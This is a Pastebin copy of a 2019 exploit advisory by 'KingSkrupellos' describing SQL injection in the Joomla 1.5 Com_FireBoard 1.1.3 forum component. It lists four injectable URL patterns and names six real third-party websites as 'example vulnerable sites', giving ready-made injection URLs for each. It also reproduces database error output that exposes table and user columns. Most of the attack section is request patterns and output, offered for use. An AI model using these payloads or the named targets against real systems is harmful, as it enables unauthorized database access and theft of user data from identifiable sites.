Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : Joomla 1.5.26 Com_FireBoard Components 1.1.3 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 24/08/2019
- # Vendor Homepage : fireboard.bestofjoomla.com
- # Software Information Link : infosolutionsgoa.com/cms/fireboard-forum-joomla.html
- # Software Download Link : artio.net/downloads/joomla/joomsef/joomsef-2-x-extensions-free
- # Software Affected Version : Com_FireBoard 1.1.3
- # Joomla Affected Version : Joomla 1.5.0 - 1.5.1 - 1.5.8 - 1.5.18 - 1.5.26
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Impact :
- ***********
- Joomla 1.5.26 Com_FireBoard Components 1.1.3 is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or
- modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application and
- execute arbitrary SQL commands in application`s database. Further exploitation of this
- vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- ###################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_fireboard&Itemid=[ID-NUMBER]&id=[ID-NUMBER]&catid=[SQL Injection]&func=fb_pdf
- /index.php?option=com_fireboard&Itemid=[ID-NUMBER]&func=view&id=[ID-NUMBER]&catid=[SQL Injection]&fontstyle=f-larger&lang=ru
- /index.php?option=com_fireboard&func=userlist&orderby=username&direction=ASC<=zh&lang=zh&limitstart=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_fireboard&Itemid=[ID-NUMBER]&func=showcat&id=[ID-NUMBER]&view=threadedview&catid=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- [+] pionieredellanautica.it/index.php?option=com_fireboard&Itemid=22&id=39&catid=1%27&func=fb_pdf
- [+] panghud.ac.th/panghud/index.php?option=com_fireboard&Itemid=0&id=17&catid=9&func=fb_pdf
- [+] turani.ro/index.php?option=com_fireboard&func=userlist&orderby=username&direction=ASC%E2%8C%A9=zh&lang=zh&limitstart=210&Itemid=1%27
- [+] efurmedia.com/index.php?option=com_fireboard&func=userlist&orderby=username&direction=ASC%E2%8C%A9=zh&lang=zh&limitstart=210&Itemid=1%27
- [+] compling.tj/index.php?option=com_fireboard&Itemid=2&func=view&id=1&catid=2&fontstyle=f-larger&lang=ru
- [+] bpao.go.th/bpaoweb/index.php?option=com_fireboard&Itemid=8&func=showcat&id=0&view=threadedview&catid=1%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- Fatal error: Unable to load categorie detail.\nDB function failed with error number 1064
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
- for the right syntax to use near '' at line 1 SQL=SELECT id,pub_access,pub_recurse,admin_access,
- SQL =SELECT id,pub_access,pub_recurse,admin_access,admin_recurse FROM jos_
- fb_categories where id=admin_recurse FROM jos_fb_categories where id=
- 500 - No valid database connection:You have an error in your SQL syntax; check the manual that corresponds
- to your MySQL server version for the right syntax to use near 'ASCâ?Š=zh, id ASCâ?Š=zh LIMIT 210, 30'
- at line 4 SQL=SELECT u.id, u.name, u.username , u.usertype , u.email , u.registerDate, u.lastvisitDate ,
- fu.showOnline, fu.group_id, fu.posts ,fu.karma , fu.uhits , g.title FROM jos_users AS u INNER JOIN
- jos_fb_users AS fu ON fu.userid = u.id INNER JOIN jos_fb_groups AS g ON g.id = fu.group_id
- ORDER BY username ASCâ?Š=zh, id ASCâ?Š=zh LIMIT 210, 30
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Add Comment
Please, Sign In to add comment